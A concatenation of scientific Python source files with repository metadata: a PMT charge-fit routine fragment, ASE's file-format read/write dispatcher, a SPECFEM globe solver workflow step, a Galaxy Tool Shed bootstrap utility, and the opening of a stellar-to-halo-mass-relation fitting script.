enumerate(startparams): funcstring += names[i] + "," funcstring = funcstring[:-1] + "):\n" funcstring += "\tmodel.startparams = (" for i,__ in enumerate(startparams): funcstring += names[i] + "," funcstring = funcstring[:-1] + ")\n" funcstring += "\tmodel.fit_to_data(charges, nbins, silent=True, **kwargs)" funcstring += "\treturn model.chi2_ndf" #def do_min(a, b, c, d, e, f, g, h, i, j, k): #FIXME!!! # model.startparams = (a, b, c, d, e, f, g, h, i, j, k) # model.fit_to_data(charges, nbins, silent=True, **kwargs) # return model.chi2_ndf exec(funcstring) bnd = kwargs["bounds"] if "bounds" in kwargs: min_kwargs = dict() for i,__ in enumerate(startparams): min_kwargs["limit_" + names[i]] =(bnd[0][i],bnd[1][i]) m = Minuit(do_min, **min_kwargs) #m = Minuit(do_min, limit_a=(bnd[0][0],bnd[1][0]), # limit_b=(bnd[0][1],bnd[1][1]), # limit_c=(bnd[0][2],bnd[1][2]), # limit_d=(bnd[0][3],bnd[1][3]), # limit_e=(bnd[0][4],bnd[1][4]), # limit_f=(bnd[0][5],bnd[1][5]), # limit_g=(bnd[0][6],bnd[1][6]), # limit_h=(bnd[0][7],bnd[1][7]), # limit_i=(bnd[0][8],bnd[1][8]), # limit_j=(bnd[0][9],bnd[1][9]), # limit_k=(bnd[0][10],bnd[1][10])) else: m = Minuit(do_min) # hand over the startparams for key, value in zip(["a","b","c","d","e","f","g","h","i","j"], startparams): m.values[key] = value m.migrad() else: model.startparams = startparams model.fit_to_data(charges, nbins,normalize=normalize, silent=silent, **kwargs) # check for named tuple if hasattr(startparams, "_make"): # duck typing best_fit_params = startparams._make(model.best_fit_params) else: best_fit_params = model.best_fit_params print("Best fit parameters {}".format(best_fit_params)) return model
achim1/pmttools
pmttools/fit_routines.py
Python
gpl-3.0
8,148
[ "Gaussian" ]
b7e7d67ec2b7a4f7a7d9d990c9313a6aff4963904df82ca64a45fbce5d6d0d00
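The occupancy formula used in pedestal_fit above, mu = -ln(N_ped/N_trig), follows from Poisson statistics: the pedestal collects exactly the zero-photoelectron triggers, so N_ped/N_trig estimates P(0) = exp(-mu). A minimal numeric sketch (the counts are made up for illustration):

import numpy as np

n_trig = 100000   # recorded waveforms
n_ped = 90484     # waveforms consistent with the pedestal (no hit)
mu = -np.log(n_ped / float(n_trig))
print("mu = {:.3f}".format(mu))   # ~0.100 expected photoelectrons per trigger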
import os
import sys

from os.path import basename
from tarfile import is_tarfile
from zipfile import is_zipfile

from ase.atoms import Atoms
from ase.units import Bohr
from ase.io.trajectory import PickleTrajectory
from ase.io.bundletrajectory import BundleTrajectory

__all__ = ['read', 'write', 'PickleTrajectory', 'BundleTrajectory']


def read(filename, index=-1, format=None):
    """Read Atoms object(s) from file.

    filename: str
        Name of the file to read from.
    index: int or slice
        If the file contains several configurations, the last configuration
        will be returned by default.  Use index=n to get configuration
        number n (counting from zero).
    format: str
        Used to specify the file-format.  If not given, the
        file-format will be guessed by the *filetype* function.

    Known formats:

    =========================  ===========
    format                     short name
    =========================  ===========
    GPAW restart-file          gpw
    Dacapo netCDF output file  dacapo
    Old ASE netCDF trajectory  nc
    Virtual Nano Lab file      vnl
    ASE pickle trajectory      traj
    ASE bundle trajectory      bundle
    GPAW text output           gpaw-text
    CUBE file                  cube
    XCrySDen Structure File    xsf
    Dacapo text output         dacapo-text
    XYZ-file                   xyz
    VASP POSCAR/CONTCAR file   vasp
    VASP OUTCAR file           vasp_out
    Protein Data Bank          pdb
    CIF-file                   cif
    FHI-aims geometry file     aims
    FHI-aims output file       aims_out
    VTK XML Image Data         vti
    VTK XML Structured Grid    vts
    VTK XML Unstructured Grid  vtu
    TURBOMOLE coord file       tmol
    exciting input             exi
    AtomEye configuration      cfg
    WIEN2k structure file      struct
    DftbPlus input file        dftb
    ETSF format                etsf.nc
    =========================  ===========

    """
    if isinstance(filename, str):
        p = filename.rfind('@')
        if p != -1:
            try:
                index = string2index(filename[p + 1:])
            except ValueError:
                pass
            else:
                filename = filename[:p]

    if isinstance(index, str):
        index = string2index(index)

    if format is None:
        format = filetype(filename)

    if format.startswith('gpw'):
        import gpaw
        r = gpaw.io.open(filename, 'r')
        positions = r.get('CartesianPositions') * Bohr
        numbers = r.get('AtomicNumbers')
        cell = r.get('UnitCell') * Bohr
        pbc = r.get('BoundaryConditions')
        tags = r.get('Tags')
        magmoms = r.get('MagneticMoments')

        atoms = Atoms(positions=positions, numbers=numbers, cell=cell,
                      pbc=pbc)
        if tags.any():
            atoms.set_tags(tags)
        if magmoms.any():
            atoms.set_initial_magnetic_moments(magmoms)

        return atoms

    if format == 'exi':
        from ase.io.exciting import read_exciting
        return read_exciting(filename, index)

    if format == 'xyz':
        from ase.io.xyz import read_xyz
        return read_xyz(filename, index)

    if format == 'traj':
        from ase.io.trajectory import read_trajectory
        return read_trajectory(filename, index)

    if format == 'bundle':
        from ase.io.bundletrajectory import read_bundletrajectory
        return read_bundletrajectory(filename, index)

    if format == 'cube':
        from ase.io.cube import read_cube
        return read_cube(filename, index)

    if format == 'nc':
        from ase.io.netcdf import read_netcdf
        return read_netcdf(filename, index)

    if format == 'gpaw-text':
        from ase.io.gpawtext import read_gpaw_text
        return read_gpaw_text(filename, index)

    if format == 'dacapo-text':
        from ase.io.dacapo import read_dacapo_text
        return read_dacapo_text(filename)

    if format == 'dacapo':
        from ase.io.dacapo import read_dacapo
        return read_dacapo(filename)

    if format == 'xsf':
        from ase.io.xsf import read_xsf
        return read_xsf(filename, index)

    if format == 'vasp':
        from ase.io.vasp import read_vasp
        return read_vasp(filename)

    if format == 'vasp_out':
        from ase.io.vasp import read_vasp_out
        return read_vasp_out(filename, index)

    if format == 'mol':
        from ase.io.mol import read_mol
        return read_mol(filename)

    if format == 'pdb':
        from ase.io.pdb import read_pdb
        return read_pdb(filename)

    if format == 'cif':
        from ase.io.cif import read_cif
        return read_cif(filename, index)

    if format == 'struct':
        from ase.io.wien2k import read_struct
        return read_struct(filename)

    if format == 'vti':
        from ase.io.vtkxml import read_vti
        return read_vti(filename)

    if format == 'vts':
        from ase.io.vtkxml import read_vts
        return read_vts(filename)

    if format == 'vtu':
        from ase.io.vtkxml import read_vtu
        return read_vtu(filename)

    if format == 'aims':
        from ase.io.aims import read_aims
        return read_aims(filename)

    if format == 'aims_out':
        from ase.io.aims import read_aims_output
        return read_aims_output(filename, index)

    if format == 'iwm':
        from ase.io.iwm import read_iwm
        return read_iwm(filename)

    if format == 'Cmdft':
        from ase.io.cmdft import read_I_info
        return read_I_info(filename)

    if format == 'tmol':
        from ase.io.turbomole import read_turbomole
        return read_turbomole(filename)

    if format == 'cfg':
        from ase.io.cfg import read_cfg
        return read_cfg(filename)

    if format == 'dftb':
        from ase.io.dftb import read_dftb
        return read_dftb(filename)

    if format == 'sdf':
        from ase.io.sdf import read_sdf
        return read_sdf(filename)

    if format == 'etsf':
        from ase.io.etsf import ETSFReader
        return ETSFReader(filename).read_atoms()

    raise RuntimeError('File format descriptor ' + format + ' not recognized!')


def write(filename, images, format=None, **kwargs):
    """Write Atoms object(s) to file.

    filename: str
        Name of the file to write to.
    images: Atoms object or list of Atoms objects
        A single Atoms object or a list of Atoms objects.
    format: str
        Used to specify the file-format.  If not given, the
        file-format will be taken from suffix of the filename.

    The accepted output formats:

    =========================  ===========
    format                     short name
    =========================  ===========
    ASE pickle trajectory      traj
    ASE bundle trajectory      bundle
    CUBE file                  cube
    XYZ-file                   xyz
    VASP POSCAR/CONTCAR file   vasp
    Protein Data Bank          pdb
    CIF-file                   cif
    XCrySDen Structure File    xsf
    FHI-aims geometry file     aims
    gOpenMol .plt file         plt
    Python script              py
    Encapsulated Postscript    eps
    Portable Network Graphics  png
    Persistance of Vision      pov
    VTK XML Image Data         vti
    VTK XML Structured Grid    vts
    VTK XML Unstructured Grid  vtu
    TURBOMOLE coord file       tmol
    exciting                   exi
    AtomEye configuration      cfg
    WIEN2k structure file      struct
    DftbPlus input file        dftb
    ETSF                       etsf.nc
    =========================  ===========

    The use of additional keywords is format specific.

    The ``cube`` and ``plt`` formats accept (plt requires it) a ``data``
    keyword, which can be used to write a 3D array to the file along
    with the nuclei coordinates.

    The ``vti``, ``vts`` and ``vtu`` formats are all specifically directed
    for use with MayaVi, and the latter is designated for visualization of
    the atoms whereas the two others are intended for volume data. Further,
    it should be noted that the ``vti`` format is intended for orthogonal
    unit cells as only the grid-spacing is stored, whereas the ``vts`` format
    additionally stores the coordinates of each grid point, thus making it
    useful for volume data in more general unit cells.

    The ``eps``, ``png``, and ``pov`` formats are all graphics formats,
    and accept the additional keywords:

    rotation: str (default '')
        The rotation angles, e.g. '45x,70y,90z'.

    show_unit_cell: int (default 0)
        Can be 0, 1, 2 to either not show, show, or show all of the unit cell.

    radii: array or float (default 1.0)
        An array of same length as the list of atoms indicating the sphere
        radii. A single float specifies a uniform scaling of the default
        covalent radii.

    bbox: 4 floats (default None)
        Set the bounding box to (xll, yll, xur, yur) (lower left,
        upper right).

    colors: array (default None)
        An array of same length as the list of atoms, indicating the rgb
        color code for each atom. Default is the jmol_colors of
        ase/data/colors.

    scale: int (default 20)
        Number of pixels per Angstrom.

    For the ``pov`` graphics format, ``scale`` should not be specified.
    The elements of the color array can additionally be strings, or 4
    and 5 vectors for named colors, rgb + filter, and rgb + filter + transmit
    specification. This format accepts the additional keywords:

    ``run_povray``, ``display``, ``pause``, ``transparent``,
    ``canvas_width``, ``canvas_height``, ``camera_dist``,
    ``image_plane``, ``camera_type``, ``point_lights``,
    ``area_light``, ``background``, ``textures``, ``celllinewidth``,
    ``bondlinewidth``, ``bondatoms``
    """

    if format is None:
        if filename == '-':
            format = 'xyz'
            filename = sys.stdout
        elif 'POSCAR' in filename or 'CONTCAR' in filename:
            format = 'vasp'
        elif 'OUTCAR' in filename:
            format = 'vasp_out'
        elif filename.endswith('etsf.nc'):
            format = 'etsf'
        else:
            suffix = filename.split('.')[-1]
            format = {}.get(suffix, suffix)  # XXX this does not make sense
            # Maybe like this:
            ## format = {'traj': 'trajectory',
            ##           'nc': 'netcdf',
            ##           'exi': 'exciting',
            ##           'in': 'aims',
            ##           'tmol': 'turbomole',
            ##           }.get(suffix, suffix)

    if format == 'exi':
        from ase.io.exciting import write_exciting
        write_exciting(filename, images)
        return
    if format == 'cif':
        from ase.io.cif import write_cif
        write_cif(filename, images)
    if format == 'xyz':
        from ase.io.xyz import write_xyz
        write_xyz(filename, images)
        return
    elif format == 'in':
        format = 'aims'
    elif format == 'tmol':
        from ase.io.turbomole import write_turbomole
        write_turbomole(filename, images)
        return
    elif format == 'dftb':
        from ase.io.dftb import write_dftb
        write_dftb(filename, images)
        return
    elif format == 'struct':
        from ase.io.wien2k import write_struct
        write_struct(filename, images, **kwargs)
        return
    elif format == 'findsym':
        from ase.io.findsym import write_findsym
        write_findsym(filename, images)
        return
    elif format == 'etsf':
        from ase.io.etsf import ETSFWriter
        writer = ETSFWriter(filename)
        if not isinstance(images, (list, tuple)):
            images = [images]
        writer.write_atoms(images[0])
        writer.close()
        return

    format = {'traj': 'trajectory',
              'nc': 'netcdf',
              'bundle': 'bundletrajectory'
              }.get(format, format)
    name = 'write_' + format

    if format in ['vti', 'vts', 'vtu']:
        format = 'vtkxml'

    if format is None:
        format = filetype(filename)

    try:
        write = getattr(__import__('ase.io.%s' % format, {}, {}, [name]), name)
    except ImportError:
        raise TypeError('Unknown format: "%s".' % format)

    write(filename, images, **kwargs)


def string2index(string):
    if ':' not in string:
        return int(string)
    i = []
    for s in string.split(':'):
        if s == '':
            i.append(None)
        else:
            i.append(int(s))
    i += (3 - len(i)) * [None]
    return slice(*i)


def filetype(filename):
    """Try to guess the type of the file."""
    if os.path.isdir(filename):
        # Potentially a BundleTrajectory
        if BundleTrajectory.is_bundle(filename):
            return 'bundle'
        else:
            raise IOError('Directory: ' + filename)

    fileobj = open(filename)
    s3 = fileobj.read(3)
    if len(s3) == 0:
        raise IOError('Empty file: ' + filename)

    if is_tarfile(filename):
        return 'gpw'

    if s3 == 'CDF':
        from ase.io.pupynere import NetCDFFile
        nc = NetCDFFile(filename)
        if 'number_of_dynamic_atoms' in nc.dimensions:
            return 'dacapo'

        history = nc.history
        if history == 'GPAW restart file':
            return 'gpw-nc'
        if history == 'ASE trajectory':
            return 'nc'
        if history == 'Dacapo':
            return 'dacapo'
        if hasattr(nc, 'file_format') and nc.file_format.startswith('ETSF'):
            return 'etsf'
        raise IOError('Unknown netCDF file!')

    if is_zipfile(filename):
        return 'vnl'

    fileobj.seek(0)
    lines = fileobj.readlines(1000)

    if lines[0].startswith('PickleTrajectory'):
        return 'traj'

    if lines[1].startswith('OUTER LOOP:') or filename.lower().endswith('.cube'):
        return 'cube'

    if ' ___ ___ ___ _ _ _ \n' in lines:
        return 'gpaw-text'

    if (' &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&\n'
        in lines[:90]):
        return 'dacapo-text'

    for line in lines:
        if line[0] != '#':
            word = line.strip()
            if word in ['ANIMSTEPS', 'CRYSTAL', 'SLAB', 'POLYMER', 'MOLECULE']:
                return 'xsf'

    filename_v = basename(filename)
    if 'POSCAR' in filename_v or 'CONTCAR' in filename_v:
        return 'vasp'

    if 'OUTCAR' in filename_v:
        return 'vasp_out'

    if filename.lower().endswith('.exi'):
        return 'exi'

    if filename.lower().endswith('.mol'):
        return 'mol'

    if filename.lower().endswith('.pdb'):
        return 'pdb'

    if filename.lower().endswith('.cif'):
        return 'cif'

    if filename.lower().endswith('.struct'):
        return 'struct'

    if filename.lower().endswith('.in'):
        return 'aims'

    if filename.lower().endswith('.out'):
        return 'aims_out'

    if filename.lower().endswith('.cfg'):
        return 'cfg'

    if os.path.split(filename)[1] == 'atoms.dat':
        return 'iwm'

    if filename.endswith('I_info'):
        return 'Cmdft'

    if lines[0].startswith('$coord'):
        return 'tmol'

    if lines[0].startswith('Geometry'):
        return 'dftb'

    if s3 == '<?x':
        from ase.io.vtkxml import probe_vtkxml
        xmltype = probe_vtkxml(filename)
        if xmltype == 'ImageData':
            return 'vti'
        elif xmltype == 'StructuredGrid':
            return 'vts'
        elif xmltype == 'UnstructuredGrid':
            return 'vtu'
        elif xmltype is not None:
            raise IOError('Unknown VTK XML file!')

    if filename.lower().endswith('.sdf'):
        return 'sdf'

    return 'xyz'
slabanja/ase
ase/io/__init__.py
Python
gpl-2.0
15,788
[ "ASE", "CRYSTAL", "FHI-aims", "GPAW", "Mayavi", "NetCDF", "TURBOMOLE", "VASP", "VTK", "WIEN2k", "exciting" ]
5e49e86cfcab7defe4b108ac8f4254b00e61601c71096e04593055937208b670
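A short usage sketch for the ase.io read/write entry points above; the water geometry is illustrative, and the filename@index form is the one parsed by string2index in the file:

from ase import Atoms
from ase.io import read, write

atoms = Atoms('H2O', positions=[(0.76, 0.59, 0), (-0.76, 0.59, 0), (0, 0, 0)])
write('water.xyz', atoms)      # format guessed from the .xyz suffix
again = read('water.xyz')      # last configuration by default (index=-1)
first = read('water.xyz@0')    # explicit index via the filename@index form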
from verce.processing import *
import socket
import traceback
import os
import json


class specfemGlobeRunSolverMov(SeismoPreprocessingActivity):

    def compute(self):

        stdoutdata = None
        stderrdata = None
        if self.parameters["mpi_invoke"] == 'mpiexec.hydra' or self.parameters["mpi_invoke"] == 'mpirun':
            stdoutdata, stderrdata = commandChain([["{};{};{}".format(
                self.parameters["mpi_invoke"] + ' -np ' + str(self.parameters["NPROC"]) + " ./bin/xspecfem3D",
                "mkdir -p OUTPUT_FILES/waveform",
                "mv OUTPUT_FILES/*.ascii OUTPUT_FILES/waveform"
            )]], os.environ.copy())
        else:
            stdoutdata, stderrdata = commandChain([["{};{};{}".format(
                self.parameters["mpi_invoke"] + " ./bin/xspecfem3D",
                "mkdir -p OUTPUT_FILES/waveform",
                "mv OUTPUT_FILES/*.ascii OUTPUT_FILES/waveform"
            )]], os.environ.copy())

        self.addOutput(os.getcwd() + "/OUTPUT_FILES/waveform/",
                       metadata={'prov:type': 'synthetic-waveform'},
                       location="file://" + socket.gethostname() + "/" + os.getcwd() + "/OUTPUT_FILES/waveform/",
                       format="text/plain")

        self.addOutput(os.getcwd() + "/OUTPUT_FILES/output_solver.txt",
                       location="file://" + socket.gethostname() + "/" + os.getcwd() + "/OUTPUT_FILES/output_solver.txt",
                       format="text/plain",
                       control={"con:immediateAccess": "true"},
                       metadata={'file': 'output_solver.txt'})

        self.error += str(stderrdata)

        try:
            if self.parameters["SAVE_MESH_FILES"] == "true" or self.parameters["SAVE_MESH_FILES"] == "True" or \
                    self.parameters["SAVE_MESH_FILES"] == True:
                print "Packing mesh vtks"
                self.launchParallelCommandsChain([[["{};{}".format(
                    "tar czf OUTPUT_FILES/velocity-vtks.tar.gz OUTPUT_FILES/DATABASES_MPI/*.vtk",
                    "rm -rf OUTPUT_FILES/DATABASES_MPI/*.vtk"
                )]], os.environ.copy()])
                self.addOutput(os.getcwd() + "/OUTPUT_FILES/velocity-vtks.tar.gz",
                               location="file://" + socket.gethostname() + "/" + os.getcwd() + "/OUTPUT_FILES/velocity-vtks.tar.gz",
                               format="application/octet-stream")

            if self.parameters["MOVIE_SURFACE"] == "true" or self.parameters["MOVIE_SURFACE"] == "True" or \
                    self.parameters["MOVIE_SURFACE"] == True:
                print "Producing movie files and video"
                # generate gmt ascii files from moviedata then produce the movie file
                noOfFiles = len({name.split(".")[0] for name in os.listdir("OUTPUT_FILES") if "moviedata00" in name})
                first_time_step = self.parameters["NTSTEP_BETWEEN_FRAMES"]
                last_time_step = int(first_time_step) * noOfFiles
                self.create_gmt_ascii_files(first_time_step, str(last_time_step))

                if self.parameters["mpi_invoke"] == 'mpiexec.hydra' or self.parameters["mpi_invoke"] == 'mpirun':
                    self.launchParallelCommandsChain([[["{};{}".format(
                        self.parameters["mpi_invoke"] + " " + self.parameters["mpi_par_mov"] +
                        " python $RUN_PATH/verce-hpc-pe/src/mpi/create_movie_snapshot_tuned_globe.py" +
                        " --filespath=OUTPUT_FILES --videoname=" + self.runId + ".mp4" +
                        " --lat=" + str(self.parameters["CENTER_LATITUDE_IN_DEGREES"]) +
                        " --lon=" + str(self.parameters["CENTER_LONGITUDE_IN_DEGREES"]) +
                        " --eta=" + str(self.parameters["ANGULAR_WIDTH_ETA_IN_DEGREES"]) +
                        " --xi=" + str(self.parameters["ANGULAR_WIDTH_XI_IN_DEGREES"]) +
                        " --mesh=" + str(self.parameters["mesh"]),
                        "cp " + str(self.runId) + ".mp4 " + "OUTPUT_FILES/")]], os.environ.copy()])

                ' pre joins working processes until all chains are terminated '
                self.joinChains()

                ' compress image files and do cleanups '
                self.launchParallelCommandsChain([[["{};{};{};{}".format(
                    "tar czf OUTPUT_FILES/movie-files.tar.gz OUTPUT_FILES/moviedata*",
                    "tar czf OUTPUT_FILES/time-files.tar.gz OUTPUT_FILES/timestamp*",
                    "tar czf OUTPUT_FILES/gmt-files.tar.gz OUTPUT_FILES/gmt_movie*.xyz",
                    "tar czf OUTPUT_FILES/plt-moviedata.tar.gz OUTPUT_FILES/gmt_movie*.png")]], os.environ.copy()])
                self.joinChains()

                self.launchParallelCommandsChain([[["{};{};{}".format(
                    "rm -rf OUTPUT_FILES/moviedata*",
                    "rm -rf OUTPUT_FILES/timestamp*",
                    "rm -rf OUTPUT_FILES/gmt_movie*"
                )]], os.environ.copy()])

                self.addOutput(os.getcwd() + "/OUTPUT_FILES/movie-files.tar.gz",
                               location="file://" + socket.gethostname() + "/" + os.getcwd() + "/OUTPUT_FILES/movie-files.tar.gz",
                               format="application/octet-stream")

                self.addOutput(os.getcwd() + "/OUTPUT_FILES/time-files.tar.gz",
                               location="file://" + socket.gethostname() + "/" + os.getcwd() + "/OUTPUT_FILES/time-files.tar.gz",
                               format="application/octet-stream",
                               control={"con:immediateAccess": "true"})

                self.addOutput(os.getcwd() + "/OUTPUT_FILES/ascii-moviedata.tar.gz",
                               location="file://" + socket.gethostname() + "/" + os.getcwd() + "/OUTPUT_FILES/ascii-moviedata.tar.gz",
                               format="application/octet-stream",
                               control={"con:immediateAccess": "true"})

                self.addOutput(os.getcwd() + "/OUTPUT_FILES/plt-moviedata.tar.gz",
                               location="file://" + socket.gethostname() + "/" + os.getcwd() + "/OUTPUT_FILES/plt-moviedata.tar.gz",
                               format="image/png")

                if os.path.isfile(os.getcwd() + "/OUTPUT_FILES/" + self.runId + ".mp4"):
                    self.addOutput(os.getcwd() + "/OUTPUT_FILES/" + self.runId + ".mp4",
                                   location="file://" + socket.gethostname() + "/" + os.getcwd() + "/OUTPUT_FILES/" + self.runId + ".mp4",
                                   format="video/mpeg")

        except Exception, err:
            traceback.print_exc(file=sys.stderr)

    def create_gmt_ascii_files(self, first_time_step, last_time_step):
        # this is a default option value for creating files in GMT xyz ascii long/lat/U format
        gmt_ascii_input_value = '4'
        # 1=Z, 2=N and 3=E components
        components = ['1', '2', '3']
        commands = []
        for component in components:
            cmd = "echo \" %s \n %s \n %s \n %s \" | ./bin/xcreate_movie_AVS_DX " % (gmt_ascii_input_value, first_time_step, last_time_step, component)
            commands.append(cmd)
            print cmd
        stdoutdata, stderrdata = commandChain(commands, os.environ.copy())
        self.error += str(stderrdata)


if __name__ == "__main__":
    proc = specfemGlobeRunSolverMov("specfemGlobeRunSolverMov")
    proc.process()
KNMI/VERCE
verce-hpc-pe/src/specfemGlobeRunSolverMov.py
Python
mit
7,287
[ "VTK" ]
576c1a6b60114328496dcd99a8a07af731f46565cebec1c648f6f8d795e846a8
#!/usr/bin/python import argparse import ConfigParser import os import sys new_path = [ os.path.join( os.getcwd(), "lib" ) ] new_path.extend( sys.path[1:] ) sys.path = new_path from galaxy import eggs eggs.require( "SQLAlchemy >= 0.4" ) import galaxy.webapps.tool_shed.model.mapping as tool_shed_model from sqlalchemy.exc import ProgrammingError from sqlalchemy.exc import OperationalError from tool_shed.util import xml_util def check_db( config_parser ): dburi = None if config_parser.has_option( 'app:main', 'database_connection' ): dburi = config_parser.get( 'app:main', 'database_connection' ) elif config_parser.has_option( 'app:main', 'database_file' ): db_file = config_parser.get( 'app:main', 'database_file' ) dburi = "sqlite:///%s?isolation_level=IMMEDIATE" % db_file else: print 'The database configuration setting is missing from the tool_shed.ini file. Add this setting before attempting to bootstrap.' exit(1) sa_session = None database_exists_message = 'The database configured for this Tool Shed is not new, so bootstrapping is not allowed. ' database_exists_message += 'Create a new database that has not been migrated before attempting to bootstrap.' try: model = tool_shed_model.init( config_parser.get( 'app:main', 'file_path' ), dburi, engine_options={}, create_tables=False ) sa_session = model.context.current print database_exists_message exit(1) except ProgrammingError, e: pass except OperationalError, e: pass try: if sa_session is not None: result = sa_session.execute( 'SELECT version FROM migrate_version' ).first() if result[0] >= 2: print database_exists_message exit(1) else: pass except ProgrammingError, e: pass if config_parser.has_option( 'app:main', 'hgweb_config_dir' ): hgweb_config_parser = ConfigParser.ConfigParser() hgweb_dir = config_parser.get( 'app:main', 'hgweb_config_dir' ) hgweb_config_file = os.path.join( hgweb_dir, 'hgweb.config' ) if not os.path.exists( hgweb_config_file ): exit(0) hgweb_config_parser.read( hgweb_config_file ) configured_repos = hgweb_config_parser.items( 'paths' ) if len( configured_repos ) >= 1: message = "This Tool Shed's hgweb.config file contains entries, so bootstrapping is not allowed. Delete" message += " the current hgweb.config file along with all associated repositories in the configured " message += "location before attempting to boostrap." print exit(1) else: exit(0) else: exit(0) exit(0) def admin_user_info( config_parser ): user_info_config = os.path.abspath( os.path.join( os.getcwd(), 'lib/tool_shed/scripts/bootstrap_tool_shed', 'user_info.xml' ) ) tree, error_message = xml_util.parse_xml( user_info_config ) if tree is None: print "The XML file ", user_info_config, " seems to be invalid, using defaults." 
email = 'admin@test.org' password = 'testuser' username = 'admin' else: root = tree.getroot() for elem in root: if elem.tag == 'email': email = elem.text elif elem.tag == 'password': password = elem.text elif elem.tag == 'username': username = elem.text print '%s__SEP__%s__SEP__%s' % ( username, email, password ) return 0 def get_local_tool_shed_url( config_parser ): port = '9009' if config_parser.has_section( 'server:main' ): if config_parser.has_option( 'server:main', 'port' ): port = config_parser.get( 'server:main', 'port' ) host = '127.0.0.1' print 'http://%s:%s' % ( host, port ) return 0 def main( args ): config_parser = ConfigParser.ConfigParser() if os.path.exists( args.config ): config_parser.read( args.config ) else: return 1 if args.method == 'check_db': return check_db( config_parser ) elif args.method == 'admin_user_info': return admin_user_info( config_parser ) elif args.method == 'get_url': return get_local_tool_shed_url( config_parser ) else: return 1 parser = argparse.ArgumentParser() parser.add_argument( '-c', '--config_file', dest='config', action='store', default='config/tool_shed.ini.sample' ) parser.add_argument( '-e', '--execute', dest='method', action='store', default='check_db' ) args = parser.parse_args() if __name__ == '__main__': exit( main( args ) )
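
# --- Usage sketch (not part of the original script; inferred from main() and
# --- the functions above). Each mode prints its result and signals success
# --- via the exit code:
#
#   python bootstrap_util.py -c config/tool_shed.ini.sample -e check_db
#       exits 0 when the configured database is new and hgweb.config is empty
#   python bootstrap_util.py -c config/tool_shed.ini.sample -e admin_user_info
#       prints "username__SEP__email__SEP__password" taken from user_info.xml
#   python bootstrap_util.py -c config/tool_shed.ini.sample -e get_url
#       prints the local Tool Shed URL, e.g. http://127.0.0.1:9009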
mikel-egana-aranguren/SADI-Galaxy-Docker
galaxy-dist/lib/tool_shed/scripts/bootstrap_tool_shed/bootstrap_util.py
Python
gpl-3.0
4,745
[ "Galaxy" ]
f6f1071aefb9d18f37722285ce10df369adb84dfa21078f78b158c73a4f226f2
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

"""Use MCMC to find the stellar mass halo mass relation.

Based on the Behroozi et al 2010 paper.
Use a parametrization of the SHMR, plus a given HMF, to find the expected SMF
and compare it to the observed SMF with its uncertainties using a likelihood
maximisation.

Started on December 18th by Louis Legrand at IAP and IAS.
"""

import numpy as np
# import matplotlib.pyplot as plt
# import emcee
from astropy.cosmology import LambdaCDM
import scipy.optimize as op
from scipy import signal
import os

cwd = os.getcwd()

#################
### Load data ###
#################

"""Load HMF"""

# redshifts of the BolshoiPlanck files
redshift_haloes = np.arange(0, 10, step=0.1)
numredshift_haloes = np.size(redshift_haloes)

"""Definition of hmf_bolshoi columns:

hmf_bolshoi[redshift][:, 0] = Log10(mass) [Msun]
hmf_bolshoi[redshift][:, 1] = Log10(cen_mf), ie central haloes mass function (density) [1/Mpc^3]
hmf_bolshoi[redshift][:, 2] = Log10(all_macc_mf), ie all haloes mass function (density) [1/Mpc^3]
"""
hmf_bolshoi = []
for i in range(numredshift_haloes):
    hmf_bolshoi.append(
        np.loadtxt('../Data/HMFBolshoiPlanck/mf_planck/mf_planck_z' +
                   '{:4.3f}'.format(redshift_haloes[i]) + '_mvir.dat'))

"""Load the SMF from Iary Davidzon+17"""

# redshifts of the Iary Davidzon SMF
redshifts = np.array([0.2, 0.5, 0.8, 1.1, 1.5, 2, 2.5, 3, 3.5, 4.5, 5.5])
numzbin = np.size(redshifts) - 1

smf_cosmos = []
for i in range(10):
    # Select the SMFs to use: tot, pas or act; D17 or SchechterFixedMs
    smf_cosmos.append(
        np.loadtxt('../Data/Davidzon/Davidzon+17_SMF_v3.0/mf_mass2b_fl5b_tot_VmaxFit2D'
                   + str(i) + '.dat'))
    # '../Data/Davidzon/schechter_fixedMs/mf_mass2b_fl5b_tot_VmaxFit2E'
    # + str(i) + '.dat')

"""Adapt SMF to match the Bolshoi-Planck Cosmology"""

# Bolshoi-Planck cosmo: (flat LCDM)
# Om = 0.3089, Ol = 0.6911, Ob = 0.0486, h = 0.6774, s8 = 0.8159, ns = 0.9667
BP_Cosmo = LambdaCDM(H0=67.74, Om0=0.3089, Ode0=0.6911)

# Davidzon+17 SMF cosmo: (flat LCDM)
# Om = 0.3, Ol = 0.7, h = 0.7
D17_Cosmo = LambdaCDM(H0=70, Om0=0.3, Ode0=0.7)

for i in range(10):
    # Correction of the comoving volume:
    VmaxD17 = D17_Cosmo.comoving_volume(redshifts[i+1]) - D17_Cosmo.comoving_volume(redshifts[i])
    VmaxBP = BP_Cosmo.comoving_volume(redshifts[i+1]) - BP_Cosmo.comoving_volume(redshifts[i])
    # VmaxD17 = get_Vmax_mod.main(redshifts[i], redshifts[i+1], cosmo=[70, 0.3, 0.7])
    # VmaxBP = get_Vmax_mod.main(redshifts[i], redshifts[i+1], cosmo=[67.74, 0.3089, 0.6911])
    # Add the log, equivalent to multiplying by VmaxD17/VmaxBP
    smf_cosmos[i][:, 1] = smf_cosmos[i][:, 1] + np.log10(VmaxD17/VmaxBP)
    smf_cosmos[i][:, 2] = smf_cosmos[i][:, 2] + np.log10(VmaxD17/VmaxBP)
    smf_cosmos[i][:, 3] = smf_cosmos[i][:, 3] + np.log10(VmaxD17/VmaxBP)
    # Correction of the measured stellar mass
    # Equivalent to multiplying by (BP_Cosmo.H0/D17_Cosmo.H0)**-2
    smf_cosmos[i][:, 0] = smf_cosmos[i][:, 0] - 2 * np.log10(BP_Cosmo.H0/D17_Cosmo.H0)

#######################################
### Define functions and parameters ###
#######################################


def logMh(logMs, M1, Ms0, beta, delta, gamma):
    # SM-HM relation of Behroozi et al. 2010 (their eq. 21), written in log
    # space: M1 and Ms0 are log10 masses, consistent with theta0 = [12, 11, ...]
    # below, i.e. M1 ~ 10^12 Msun and Ms0 ~ 10^11 Msun.
    x = logMs - Ms0
    return M1 + beta * x + 10**(delta * x) / (1 + 10**(-gamma * x)) - 0.5


def phi_direct(logMs1, logMs2, idx_z, M1, Ms0, beta, delta, gamma):
    # SMF obtained from the SM-HM relation and the HMF
    # log_Mh1 = logMh(logMs1, M1, Ms0, beta, delta, gamma)
    # log_Mh2 = logMh(logMs2, M1, Ms0, beta, delta, gamma)
